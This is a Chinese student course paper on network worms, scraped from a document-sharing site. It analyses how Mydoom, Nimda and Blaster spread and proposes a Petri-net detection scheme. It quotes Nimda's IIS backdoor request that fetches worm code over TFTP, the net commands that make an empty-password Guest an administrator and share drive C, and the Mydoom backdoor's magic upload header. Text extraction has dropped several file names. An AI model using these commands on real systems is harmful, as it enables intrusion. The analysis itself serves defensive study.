《2022年蠕虫病毒的特征与防治 .pdf》由会员分享,可在线阅读,更多相关《2022年蠕虫病毒的特征与防治 .pdf(21页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、算法设计与分析课程论文1 研 究 生 课 程 论 文(2008-2009 学年第二学期 ) 蠕虫病毒的特征与防治摘 要随着网络的发展,以网络传播的蠕虫病毒利用网络全球互联的优势和电脑系统及网络系统安全性上的漏洞, 己经成为电脑系统安全的一大的威胁。采用网络传播的蠕虫病毒与传统的电脑病毒在很多方面都有许多不同的新特点。本文对蠕虫病毒的特征和防御策略进行了研究,透彻分析了几个流行的蠕虫病毒的本质特征和传播手段,并提出了防治未知病毒以及变形病毒的解决方案与虚拟机相结合的基于攻击行为的着色判决PN 机蠕虫检测方法。关键词 : 蠕虫,病毒特征,病毒防治精选学习资料 - - - - - - - - - 名
2、师归纳总结 - - - - - - -第 1 页,共 21 页算法设计与分析课程论文2 1 引言“蠕虫”这个生物学名词于1982 年由 Xerox PARC 的 John F. Shoeh 等人最早引入电脑领域,并给出了电脑蠕虫的两个最基本的特征: “可以从一台电脑移动到另一台电脑”和“可以自我复制” 。最初,他们编写蠕虫的目的是做分布式计算的模型试验。 1988 年 Morris 蠕虫爆发后, Eugene H. Spafford为了区分蠕虫和病毒,给出了蠕虫的技术角度的定义。 “电脑蠕虫可以独立运行,并能把自身的一个包含所有功能的版本传播到另外的电脑上。”电脑蠕虫和电脑病毒都具有传染性和复
3、制功能,这两个主要特性上的一致,导致二者之间是非常难区分的。近年来,越来越多的病毒采取了蠕虫技术来到达其在网络上迅速感染的目的。因而, “蠕虫”本身只是“电脑病毒”利用的一种技术手段1。2 蠕虫病毒的特征及传播1、一般特征 : (1) 独立个体,单独运行 ; (2) 大部分利用操作系统和应用程序的漏洞主动进行攻击; (3) 传播方式多样 ; (4) 造成网络拥塞,消耗系统资源; (5) 制作技术与传统的病毒不同,与黑客技术相结合。2、病毒与蠕虫的区别(l) 存在形式上病毒寄生在某个文件上,而蠕虫是作为独立的个体而存在; 精选学习资料 - - - - - - - - - 名师归纳总结 - - -
4、 - - - -第 2 页,共 21 页算法设计与分析课程论文3 (2) 传染机制方面病毒利用宿主程序的运行,而蠕虫利用系统存在的漏洞; (3) 传染目标病毒针对本地文件,而蠕虫针对网络上的其他电脑; (4) 防治病毒是将其从宿主文件中删除,而防治蠕虫是为系统打补丁。3、传播过程 : (1) 扫描: 由蠕虫的扫描功能模块负责探测存在漏洞的主机。(2) 攻击: 攻击模块按漏洞攻击步骤自动攻击步骤1 中找到的对象,取得该主机的权限( 一般为管理员权限 ) ,获得一个 shell。(3) 现场处理 : 进入被感染的系统后, 要做现场处理工作, 现场处理部分工作主要包括隐藏、信息搜集等等(4) 复制:
5、 复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。每一个具体的蠕虫在实现这四个部分时会有不同的侧重,有的部分实现的相当复杂,有的部分实现的则相当简略。 尼姆达病毒是一个比较典型的病毒与蠕虫技术相结合的蠕虫病毒, 它几乎包括目前所有流行病毒的传播手段,并且可以攻击 Win98/NT/2000/XP 等所有的 Windows 操作平台。 该病毒有以下 4种传播方式 : (1) 通过 Email 发送在客户端看不到的邮件附件程序sample.exe ,该部分利用了微软的 OE 信件浏览器的漏洞 ; (2) 通过网络共享的方式来传染给局域网络上的网络邻居,使用设置密码的共享方式可以有效的
6、防止该病毒的此种传播方式; (3) 通过没有补丁的 IIS 服务器来传播,该传播往往是病毒屡杀不绝的原因,该方式利用了微软 IIS 的 UNICODE 漏洞; (4) 通过感染普通的文件来传播,在这一点上和普通的病毒程序相同。4、蠕虫病毒的传播趋势精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 3 页,共 21 页算法设计与分析课程论文4 目前的流行病毒越来越表现出以下三种传播趋势: 1、通过邮件附件传播病毒,如Mydoom 等邮件病毒 ; 2、通过无口令或者弱口令共享传播病毒,如Nimda、Netskey等; 3、利用操作系统或者应用系统漏洞传播
7、病毒,如冲击波蠕虫、震荡波蠕虫等。3 目前流行的蠕虫病毒3.1 Mydoom 邮件病毒Novarg/Mydoom.a蠕虫是 2004年 1 月 28 日开始传入我国的一个通过邮件传播的蠕虫。在全球所造成的直接经济损失至少达400 亿美元,是 2004 年 1 月份十大病毒之首。该蠕虫利用欺骗性的邮件主题和内容来诱使用户运行邮件中的附件。拒绝服务的方式是向网站的WEB 服务发送大量GET 请求,在传播和攻击过程中,会占用大量系统资源, 导致系统运行变慢。 蠕虫还会在系统上留下后门,通过该后门,入侵者可以完全控制被感染的主机2。该蠕虫没有使用特别的技术和系统漏洞,之所以能造成如此大的危害, 主要还
8、是由于人们防范意识的薄弱, 和蠕虫本身传播速度较快的缘故。该蠕虫主要通过电子邮件进行传播, 它的邮件主题、 正文和所带附件的文件名都是随机的,另外它还会利用Kazaa 的共享网络来进行传播。病毒文件的图标和windows 系统记事本 (NOTEPAD.EXE) 图标非常相似,运行后会打开记事本程序,显示一些乱码信息,其实病毒已经开始运行了。病毒会创建名为“SwebSipcSmtxSO ”的排斥体来判断系统是否己经被感染。蠕虫在系统中寻找所有可能包含邮件地址的文件,包括地址簿文件、 各种网页文件等, 从中提取邮件地址, 作为发送的目标。 病毒会防止包含以下信息的域精选学习资料 - - - - -
9、 - - - - 名师归纳总结 - - - - - - -第 4 页,共 21 页算法设计与分析课程论文5 名: gov、mil、borlan、bsd、example等,病毒同样会防止包含以下信息的电子邮件帐户 : accoun 、ca、certific、 、icrosoft、info、linux 等,当病毒检测到邮件地址中含有上述域名或帐户时则忽略该地址,不将其加入到发送地址链表中。Worm 病毒主程序流程如图3-1 所示,后门程序 shimgapi.dll 如图 3-2 所示:否是失败成功开始初始化变量检 测 注 册表HKLM和HKUC下 是否 存 在键SoftwareMcirosoftW
10、indwosCurrentVersionExplorerComDlg32Version,存在则代表已感染,否则创建该键, 表示第一次感染第一次感染创建互斥体SwebSipcSmtxSO 创建互斥体SwebSipcSmtxSO 返回创 建 临 时 随 机 文 件 并 用Notepade.exe打开 (乱码 ) 生成库文件shimapi.dll ,并装载该库当前时间是否大于终止时间,大于则返回将病毒自身拷贝生成文件e 修 改 注 册 表 增 加 病 毒 自 启 动 项 ,HKLMSoftwareMicrosoftWindowsCurrentVersionRun” TaskMon ” =”判断日期是
11、否满足触发条件,假设满足则创建线程无限循环链接Sco 网站,并发送信息进行DOS 攻击打开注册表找到kazaa 共享路径,并将当前运行进程文件副本拷贝至该目录下,扩展名为 .exe、.scr、.pif、 .bat 四者之一精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 5 页,共 21 页算法设计与分析课程论文6 图 3-1 Mydoom 病毒主体流程图图 3-2 shimgapi.dll流程图Mydoom 蠕虫病毒除造成了网络资源的浪费,阻塞网络, 被攻击网站不能提创建无限循环扫描线程扫描wab 文件、 IE 临时文件、硬盘中的文本文件,将扫描到
12、的邮件地址、用户进行过滤,然后加入到邮件地址队列创 建 无 限 循 环 的 发 送 邮 件 线 程massmail_main_th, 从扫描得到的邮件地址队列取地址发送邮件,邮件的发送人地址、主题、内容、附件名称随机,附件即病毒主体结束开始加载动态库当系统为Wni9X 时,注册为系统服务查 询 当 前 线 程 信 息 , 根 据 此 信 息 获 得 动 态 库 路 径 , 修 改 注 册 表 键 将HKEY_CLASSES_R00TCLSIDE6FB5E20-DE35-llCF-9C87-00AA005127EDInProcServer32,(Default)= ”改为 ”创建后门端口并监听,
13、根据接收的首字节确定转发或接收数据并执行每半秒检查一次注册表,假设病毒主体路径被删除则补上结束精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 6 页,共 21 页算法设计与分析课程论文7 供正常服务外,最大的危险在于安装了后门程序。该后门即shimgap,通过修改注册表,使自身随着EXPLORER 的启动而运行,将自己加载到了资源管理器的进程空间中。 后门监听 3127端口,如果该端口被占用, 则递增,但不大于 3198。后门提供了两个功能 : (1) 作为端口转发代理 ; (2) 作为后门,接收上传程序并执行。当 3127 端口收到连接之后,如果
14、recv 的第一个字符是 x04,转入端口转发流程。假设第二个字符是0 x01,则取 3、4 两个字符作为目标端口,取第5-8 四个字节作为目标 IP 地址,进行连接并和当前socket数据转发。 recv 的第一个字符如果是 x85,则转入执行命令流程。先接收四个字节,转成主机字节序后验证是否是 x133c9ea2 ,验证通过则创建临时文件接收数据,接收完毕运行该文件。也就是说,只要我们把任意一个可执行文件的头部,加上五个字符 :x85133c9ea2 ,作为数据发送到感染了Mydoo 蠕虫机器的 3127 端口,这个文件, 就会在系统上被执行,从而对被感染系统的安全造成了极大的威胁。Nim
15、da 蠕虫病毒在 Nimda 蠕虫病毒出现以前,“蠕虫”技术一直是独立发展的。Nmida 病毒第一次将“蠕虫”技术和“电脑病毒”技术结合起来。从Nimda 的攻击方式来看,Nimda蠕虫病毒只攻击微软的Win X系列操作系统,它通过电子邮件、网络临近共享文件、 IE 浏览器的内嵌 MIME 类型自动执行漏洞、 IIS 服务器文件目录遍历漏洞、Code Red II和 Sad mind/IIS蠕虫留下的后门共五种方式进行传播,其中前三种方式是病毒传播方式。 关于蠕虫病毒的分析, 在很多文献3中都有提到,精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第
16、7 页,共 21 页算法设计与分析课程论文8 本文在这些文献的基础上, 重点针对几种典型的蠕虫病毒在技术实现上的特点进行分析,以期找到他们的一些共性。(1) 微软 IE 异常处理 MIME 头漏洞IE 在处理 MIME 头中“ Content2Type : ”处指定的某些类型时存在问题,攻击者可以利用这类缺陷在IE 客户端执行任意命令。(2) Microsoft IIS UniCode 解码目录遍历漏洞微软 IISIISUniCdoe 字符解码的实现中存在一个安全漏洞,导致用户可以远程通过 IIS 执行任意命令。(3) Microsoft IIS CGI 文件名错误解码漏洞微软 IISCGI
17、程序文件名时存在一个安全漏洞,由于错误地对文件名进行了两次解码,攻击者可能利用这个漏洞执行任意系统命令。(4) “Code Red II”和 Sadmind/IIS 蠕虫留下的后门程序。(l) 邮件传播蠕虫会向被攻击者发送一封携带了蠕虫附件的邮件。这个邮件由两部分MIME 类型的信息组成 : 第一部分的 MIME 类型为“text/html” ,但却没有包含文本,因此看起来是空的 ; 第二部分的 MIME 类型为“ audio/x2wav” ,但它实际上携带的是一个名为“ Readme.exe ”的 base64 编码的可执行附件。利用了“微软IE 异常处理MIME头漏洞”安全漏洞,任何运行在
18、x86 平台下并且使用微软IE5.5SP1或之前版本 ( IE5.01SP2除外) 来显示 HTML 邮件的邮件客户端软件, 都将自动执行邮件附件。用户甚至只需打开或预览邮件即可使蠕虫被执行4。精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 8 页,共 21 页算法设计与分析课程论文9 被蠕虫攻击的目标邮件的地址从以下两个来源中获得: 用户 Web Cache文件夹中的 *.htm 和*.html 文件用户通过 MAPI 服务收到 Email 邮件的内容蠕虫在这些文件中搜索看起来像邮件地址的字符串,然后向这些地址发送一份包含蠕虫拷贝的邮件。Nimd
19、a 蠕虫在 Windows 注册表中记录最后一批邮件发送的时间,然后每十天重复搜索邮件地址并重新发送蠕虫邮件。(2) IIS WEB 服务器传播蠕虫会利用两个IIS 服务器的目录遍历漏洞和以前的一些IIS 蠕虫 ( Rde CodeII 和 Sad mind/IIS) 留下的后门程序来进行传播。蠕虫按照以下几率来选择攻击目标的IP 地址: 50% 的几率,在与本地 IP 地址前两字节相同的地址(B 类网络 ) 中选择一个25% 的几率,在与本地 IP 地址前一字节相同的地址(A 类网络) 中选择一个25% 的几率,随机选择IP 地址。蠕虫首先会启动一个TFTP 服务器,监听 UDP/69 端口
20、。在开启 TFTP 服务器和确定攻击 P1地址之后, Nimda 就开始对这个 IP 地址进行扫描。首先,扫描“RdeCodeII”留下的后门。由于被“ RedCodeII”攻击过的系统中的Web虚拟目录中会留下一个名为的后门程序,Nimda 就首先扫描“”,如果这个程序存在的话,Nimda蠕虫就企图通过它在系统上执行命令。它执行类似以下命令来向其发送蠕虫代码 : GET/scripts/root.exe?/c+tftp+2i+loc 其中 Localip 是本主机的 IP 地址,这样就通过 TFTP 协议将本地的 ll 文件传播过去,而这个ll 实际上就是蠕虫代码本身,只不过它在这里是以*.
21、dll 文件的精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 9 页,共 21 页算法设计与分析课程论文10 形式存在。这样做的目的,就像前面所讲述的那样是为了利用IIS 的系统文件列表权限提升漏洞来提升蠕虫运行的权限。在将 ll 上传到目标主机上之后, 蠕虫就会通过发送 : GET/sc 的请求来运行蠕虫。此时,蠕虫是以系统管理员权限运行的。其次,如果在扫描 /Scripts 时没有成功,即目标机中没有“红色代码II ”留下的后门程序,那么蠕虫程序会继续扫描目标上的Unicode 漏洞以及二次解码漏洞,以期通过这两个漏洞在系统上执行命令,如果发现
22、其中某一个漏洞, 蠕虫就会重复利用 /scripts/root.exe所发送的 TFTP 命令来上传 ll,然后运行。作为 ISAPI程序运行后,会把自身拷贝到Windows 系统文件夹命名 Mmc.exe,然后以 带参数方式运行“ -qusery9bnow” 。这样就完成了通过IIS 进行传播的过程。(3) 文件共享传播。蠕虫访问共享网络资源,然后开始检测远程系统上的文件。如果发现一个*.exe 文件,它将蠕虫代码加到原来文件的前面,下次执行被感染文件时,将首先执行蠕虫代码。它并不感染。如果发现 *.doc 文件,它将自己拷贝到 *.doc 文件所在目录下,改名为,并设置为隐藏、系统属性。由
23、于Microsoft word 在打开该 *.doc 文件时,会首先在当前目录寻找 ll,这将首先运行蠕虫代码,这也会大大增大远程用户的感染几率。它也会利用找到的文档文件的名字创建以*.eml 和*.nws 后缀的文件,这些文件也是带有蠕虫拷贝的MIME 编码的文件。(4) 通过网页进行传播。对于受感染的 WWW 服务器, Nimda 会修改其上的 WWW 网页文件,使得精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 10 页,共 21 页算法设计与分析课程论文11 浏览该网站的用户受其感染。当蠕虫通过运行时,蠕虫生成的新程序(Mmc.exe)会在
24、整个硬盘中搜索后缀为: *.HTML , *.APS, *.HTM , 文件名为 : Default, Index,Main,Readme的文件。一旦发现了这样的文件,蠕虫会在该目录下创建一个文件,它是一个由两部分组成的MIME 编码的文件,里面也包含了蠕虫拷贝。然后蠕虫会在找到的文件的末尾增加如下Javascript代码: “ window.open( ”readme.eml “,null,“resiz able=no,top=6000,left=6000” ) ”这样,其他用户如果使用浏览器浏览被修改的网页或者资源管理(打开了预览功能 ) 来浏览共享服务器上的文件时,利用IE 浏览器异常处
25、理 MIME 头漏洞,蠕虫就可以传播到新的客户端上。(5) 通过修改 *.exe 文件进行传播。前面几种传播方式都是通过网络方式进行的,也是Nimda 最常用的传染方式,它还会像普通的病毒那样通过文件来进行传播。Nimda 蠕虫首先选择感染*.exe 文件,这样当通过软盘或局域网进行文件复制时,就会把蠕虫程序传播到其它的机器上面。感染*.exe 文件的具体做法是 : 先查找注册表中HKEY LOCAL MACHINESOFTWAREMicrosoftWindowsCurrentVersion APPPathS键的内容,这个键值存放了主机上的可执行文件名字,一旦找到Nimda 就会以病毒的方式感
26、染这些文件。把原来的 *.exe 文件作为资源存储在新的 *.exe 文件当中, 这样当运行新的精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 11 页,共 21 页算法设计与分析课程论文12 *.exe 文件时首先执行蠕虫程序,然后再调用原来的*.exe 文件来执行,这样对于用户来说感觉上只是执行了原来的*.exe 文件。还有一点, Nimda 如果发现 *.exe文件名为 Winzip32.exe, 则不进行感染。 这样做可能是为了防止重要程序WinZip无法运行导致系统崩溃。(6) 通过 Word 文档进行传播。因为修改 *.exe 文件容易
27、被杀毒软件检测到,所以Nimda 还通过替换 Word程序的一个动态连接库文件来到达传播的目的。蠕虫程序首先把自身复制到windows 目录中命名为Riched20.dll。然后它会搜索本地的共享目录中包含*.doc文件的目录, 一旦找到, 就会把自身复制到目录中并命名为,并将文件属性设置为隐藏和系统属性。由于Microsoft word 在打开该 *.doc 文件时,会首先在当前目录寻找并加载, 这样就会运行到蠕虫代码了。 不仅如此蠕虫还用找到的文档文件的名字加上 .eml 后缀来创建新文件,这些文件也是带有蠕虫拷贝的MIME 编码的文件。这样做会使得系统中出现大量.eml 文件。(7) 系
28、统感染技术蠕虫会检查注册表中的如下表项: HKEY LOCAL MACHINESOFTWAREMicrosoftWindowsCurrentVersionAPP Paths HKEY LOCAL MACHINESOFTWAREMicrosoftWindowsCurrentVersion ExplorerShell Folders 然后感染所有找到的程序。蠕虫会将自身拷贝到windwosSystem 目录中,命名为,并修改文件,将Shell 部分改为如下内容 : 精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 12 页,共 21 页算法设计与分析课程
29、论文13 Shell=exp -dontrunold 这样每次系统重启后都会运行蠕虫拷贝。它会用自身拷贝替换Windows 目录下的,这样下次执行word 时会自动执行这个蠕虫。如果蠕虫是以文件名被执行,它会将自身拷贝到Windows 临时目录中,并使用随机文件名,例如e 等。蠕虫在第一次执行时会寻找Explorer 进程,将自己的进程注册为Explorer 的一个远程线程。这样即使用户退出系统,蠕虫仍然可以继续执行。(8) 后门安装技术Nimda 蠕虫通过修改一些注册表项以降低系统安全性,同时也安装系统后门。蠕虫会将所有驱动器设置成共享状态,它会编辑如下注册表项: LanManC$-Z$ 蠕
30、虫会删除以下注册表项的所有子键以禁止共享安全性: HKLMSYSTEMCurrentControlSetServiceslanmanserverSharesSecurity 蠕虫会修改以下注册表项 : HKLMSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced 调整 Hidden,ShowsuperHidden和 HideFileExt 键值,使得使用资源管理器无法显示隐藏文件。这可以保护蠕虫代码,以免其被发现。通过执行以下命令,蠕虫还激活了Guest用户,将其密码设置为空,并将其加入到 Administrators 组中( 对于 Wi
31、ndowsNT/2000/XP用户): net user guest/add net user guest/active net user guest “”精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 13 页,共 21 页算法设计与分析课程论文14 net local group Administrators guest net local group Guests guest/add 通过执行以下命令,蠕虫将设置为完全共享 : net share c$ = c: 病毒的行为特征为5: (1) 病毒运行时会将自身复制为,%systemdir%是
32、一个变量, 它指的是操作系统安装目录中的系统目录,默认是 :“c:windowssystem”或“ c:Winntsystem32” 。(2) 病毒运行时会在系统中建立一个名为:“BILLY ”的互斥量,目的是病毒保证在内存中只有一份病毒体,防止用户发现。(3) 病毒运行时会在内存中建立一个名为: “”的进程,该进程就是活的病毒体。(4) 病毒会修改注册表,在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun中添加键值 :“windows auto update ”= “” ,以便每次启动系统时, 病毒都会运行。(5) 病毒体
33、内隐藏有一段文本信息: I just want to say LOVE YOU SAN! Billy gates why do you make this possible? Stop making money and youre your software!(6) 病毒会以 20 秒为间隔,每 20 秒检测一次网络状态,当网络可用时,病毒会在本地的 UDP/69 端口上建立一个 TFPT 服务器,并启动一个攻击传播线程,不断的随机生成攻击地址,进行攻击,另外该病毒攻击时,会首先搜索子网的IP地址,以便就近攻击。精选学习资料 - - - - - - - - - 名师归纳总结 - - - - -
34、 - -第 14 页,共 21 页算法设计与分析课程论文15 (7) 当病毒扫描到电脑后,就会向目标电脑的TCP/135 端口发送数据。(8) 当病毒攻击成功后,目标电脑便会监听的TCP/4444 端口作为后门,并绑定。然后蠕虫会连接到这个端口,发送TFTP 下载信息,目标主机通过TFTP 下载病毒并运行病毒。(9) 当病毒攻击失败时,可能会造成没有打补丁的Wind。邢系统 RCP 服务崩溃,WindowXP 系统可能会自动重启电脑。(10) 病毒检测到当前系统月份是8 月之后或者日期是巧日之后, 就会向微软的更新站点“ windowsupdate ”发动拒绝服务攻击,使微软网站的更新站点无法
35、为用户提供服务。从上面冲击波病毒的行为特征我们可以看出,冲击波病毒与其他两个病毒的不同点在于其传播方式。 冲击波病毒利用了windows 系统的 DCOM RPC 缓冲区漏洞攻击系统, 一旦攻击成功, 病毒体将会被传送到对方电脑中进行感染,不需要用户的参与, 而其他两种是通过邮件附件的方式,引诱用户点击执行。 破坏性方面因病毒而异,病毒的执行、自启动方面三种病毒都相似。Remote Procedure Call(RPC)是运用于 Windows 操作系统上的一种协议。 RPC 提供相互处理通信机制,允许运行该程序的电脑在一个远程系统上执行代码。RPC 协议本身源于OSF(open Softwa
36、re Foundation)RPC 协议,后来又另外增加了一些Microsoft 专用扩展功能。 RPC 中处理 TCP/IP 信息交换的模块由于错误的处理畸形信息,导致存在缓冲区溢出漏洞, 远程攻击者可利用此缺陷以本地系统权限在系统上执行任意指令,如安装程序、查看或更改、删除数据或建立系统管理员权限的帐户。据 CERT 安全小组称, 操作系统中超过 50% 的安全漏洞都是由内存溢出引起的,其中大多数与微软技术有关, 这些与内存溢出相关的安全漏洞正在被越来越精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 15 页,共 21 页算法设计与分析课程论文
37、16 多的蠕虫病毒所利用。 缓冲区溢出是指当电脑程序向缓冲区内填充的数据位数超过缓冲区本身的容量时, 溢出的数据就会覆盖在合法数据上,这些数据可能是数值、下一条指令的指针,或者是其他程序的输出内容。一般情况下,覆盖其他数据区的数据是没有意义的, 最多造成应用程序错误, 但是如果输入的数据是经过“黑客”或者病毒精心设计的,覆盖缓冲区的数据恰恰是“黑客”或者病毒的入侵程序代码,一旦多余字节被编译执行, “黑客”或者病毒就有可能为所欲为,获取系统的控制权。溢出根源在于编程 : 缓冲区溢出是由编程错误引起的。如果缓冲区被写满,而程序没有去检查缓冲区边界, 也没有停止接收数据, 这时缓冲区溢出就会发生。
38、因此防止利用缓冲区溢出发起的攻击,关键在于程序开发者在开发程序时仔细检查溢出情况,不允许数据溢出缓冲区。此外, 用户需要经常登录操作系统和应用程序提供商的网站,跟踪公布的系统漏洞,及时下载补丁程序,弥补系统漏洞。4 蠕虫病毒的防治蠕虫病毒不同于一般的文件型病毒,既表现出了强大的功能, 也表现出了自身的特点, 变种多,功能相似, 但当前反病毒厂商仍然利用传统的病毒特征串查毒法进行查毒。 虽然随着病毒库的与日俱增,效率与日俱下, 倒也还能满足目前的反病毒要求, 但琼斯病毒的出现, 彻底宣判了单纯特征串查毒法的死刑,迫切需要一种新式高效的查毒方法来应对琼斯这类变形蠕虫病毒。笔者总结了现有的蠕虫病毒非
39、特征串检测方法,并提出了自己的观点。精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 16 页,共 21 页算法设计与分析课程论文17 因为目前的蠕虫病毒越来越表现出三种传播趋势: 邮件附件、无口令或者弱口令共享、利用操作系统或者应用系统漏洞来传播病毒,所以防治蠕虫也应从这三方面下手 : (1) 针对通过邮件附件传播的病毒: 在邮件服务器上安装杀毒软件, 对附件进行杀毒 : 在 客 户 端 ( 主 要 是 out1ook) 限 制 访 问 附 件 中 的 特 定 扩 展 名 的 文 件 ,如.pif、.vbs、.js、.exe等; 用户不运行可疑邮件
40、携带的附件。(2) 针对弱口令共享传播的病毒: 严格来说,通过共享和弱口令传播的蠕虫大多也利用了系统漏洞。 这类病毒会搜索网络上的开放共享并复制病毒文件,更进一步的蠕虫还自带了口令猜测的字典来破解薄弱用户口令,尤其是薄弱管理员口令。对于此类病毒, 在安全策略上需要增加口令的强度策略,保证必要的长度和复杂度; 通过网络上的其他主机定期扫描开放共享和对登录口令进行破解尝试,发现问题及时整改。(3) 针对通过系统漏洞传播的病毒: 配置 WindowsUpdate 自动升级功能,使主机能够及时安装系统补丁,防患于未然; 定期通过漏洞扫描产品查找主机存在的漏洞,发现漏洞,及时升级; 关注系统提供商、安全
41、厂商的安全警告,如有问题,则采取相应措施。(4) 重命名或删除命令解释器: 如 Windows 系统下的 ; 通过防火墙禁止除服务端口外的其他端口,切断蠕虫的传播通道和通信通道。基于攻击行为的着色判决NP 机入侵检测系统模型基于攻击行为的着色判决NP机入侵检测系统模型是成都信息安全与国家计精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 17 页,共 21 页算法设计与分析课程论文18 算网格实验室刘培顺博士提出的,该模型利用Petri 网理论结合人工智能技术建立了适合攻击行为分析与检测的理论和方法6。Petri 网是由 Carl Asam Petr
42、i 博士在 1962 年提出的,它是一种网状信息流模型,包括条件和事件两类结点, 在这两类结点的有向二分图的基础上添加表示状态信息的托肯 ( token)分布,并按引发规则使得事件驱动状态演变,从而反应系统动态运行过程。 Petri 网是对异步并发系统进行建模与分析的有力工具。所谓判决 NP 机就是具有输入设输出集且行为表达式是一个定序并发表达式确实定PN 机。着色 PN 机就是为位置和变迁加上称为颜色的标识,这些标识带有数据值,从而可以相互区分不同的事件。基于攻击行为的着色判决PN 机入侵检测系统通过着色判决PN 机对攻击行为进行分析和建模,系统首先根据攻击实例表示成并发表达式,再转化为判决
43、PN 机模型,然后使用机器学习的方法,通过对模型进行归纳学习得到攻击行为的概念空间,使得系统能够在某种程度上( 基于同一弱点或相似行为的攻击) 对付未知攻击模式,从而实现攻击知识库的更新和扩展。利用着色判决PN 机的有色合成操作, 可以对多个模型合一, 从而解决多模式匹配问题, 使得系统能够在模型增加的同时保持检测的高效率。蠕虫病毒与黑客入侵具有相似性,基于攻击行为的着色判决PN 机入侵检测系统完全可以检测蠕虫病毒。 琼斯病毒虽然能够产生行为特征各异的子病毒,但这类子病毒既然是蠕虫病毒就会具有蠕虫病毒的共性,诸如自身复制、 为了能够自启动而修改注册表、 打开端口连接其他电脑等, 这些特征从理论
44、上来讲都会被基于攻击行为的着色判决PN 机入侵检测系统通过机器的自学习转化PN 机攻击模型、通过攻击模型的泛化、合一而将该类病毒检测出来。精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 18 页,共 21 页算法设计与分析课程论文19 蠕虫并不是全部都修改注册表,如SQL 蠕虫王,该病毒在溢出成功后直接创建套接字,随机产生IP 地址,并向该地址发送病毒本身。病毒只存在于主机内存,主机重启后蠕虫就会消除,但假设不及时打补丁,就会感染该病毒。而且蠕虫程序中修改注册表的顺序问题。当病毒一开始就修改注册表, 木马行为阻断技术就会马上发现病毒, 并成功阻击。
45、 但假设病毒先执行发送自身到其他主机和破坏模块, 然后再修改注册表, 这时再检测出病毒来可能为时已晚,还有可能杀毒程序也早已被删除。基于攻击行为的着色判决PN 机入侵检测系统, 从理论上来讲能够检测出各种蠕虫病毒, 但这种检测同样是建立在事后法办的基础上,只不过是在病毒特征行为只执行了几个, 功能未完全发挥出来就被逮住, 但这对于主机安全来说同样是一个威胁。 防治病毒应该建立在事前预防的基础之上,虚拟机就能满足这个要求,我们提出与虚拟机相结合的基于攻击行为的着色判决PN 机蠕虫检测系统这个方案。该方案与防火墙相结合, 对进出网络的数据流量进行检测。当检测到电子邮件附件或 ftp下载的文件是可执
46、行文件时, 则用嵌套的虚拟机虚拟执行, 并用基于攻击行为的着色判决PN 机对指令进行分析,分析通过则放行,否则隔离删除,并向通信双方发送文件被检测出病毒并被删除的消息。5 结束语蠕虫病毒成为当前网络环境下病毒的重要形式,由于该病毒本身的特点加上网络用户安全意识的淡薄, 一个新型蠕虫病毒往往迅速扩散,并在全球范围内造成重大损失。通过对2004年十大流行病毒之一Mydoom 蠕虫病毒代码进行了详精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 19 页,共 21 页算法设计与分析课程论文20 细分析,对 Nimda 病毒、冲击波病毒等也进行了研究,总结了
47、蠕虫的行为特点,提出了防治未知病毒特别是象琼斯这样的变形病毒的解决方案与虚拟机相结合的基于攻击行为的着色判决PN 机蠕虫检测系统。精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 20 页,共 21 页算法设计与分析课程论文21 参考文献1 “完美”的蠕虫.网络信息与安全.2002(11):22-24 2 伊传勇等 .新型蠕虫Dos 攻击的分析与治疗.电脑安全 .2003(07):25-27 3Subramanya , S.R. Computer viruses Potentials , IEEE ,、 blmue:20 , Issue:4 ,oct
48、-nov.2001Pgaes:16 一 19 4 “震荡波”解决方案.电脑安全 .2004(06):33-35 5 Chen,L,C. The Impact of Countermeasure propagation on the prevalence of Computer Viruses Systems,Man and Cybernetics,Part B,IEEE Transactions on,Vol:34 ,Issue:2,April 2004 Pgaes:823-833 6 如何更有效实施病毒防御.网络安全技术与应用.2003(10) 精选学习资料 - - - - - - - - - 名师归纳总结 - - - - - - -第 21 页,共 21 页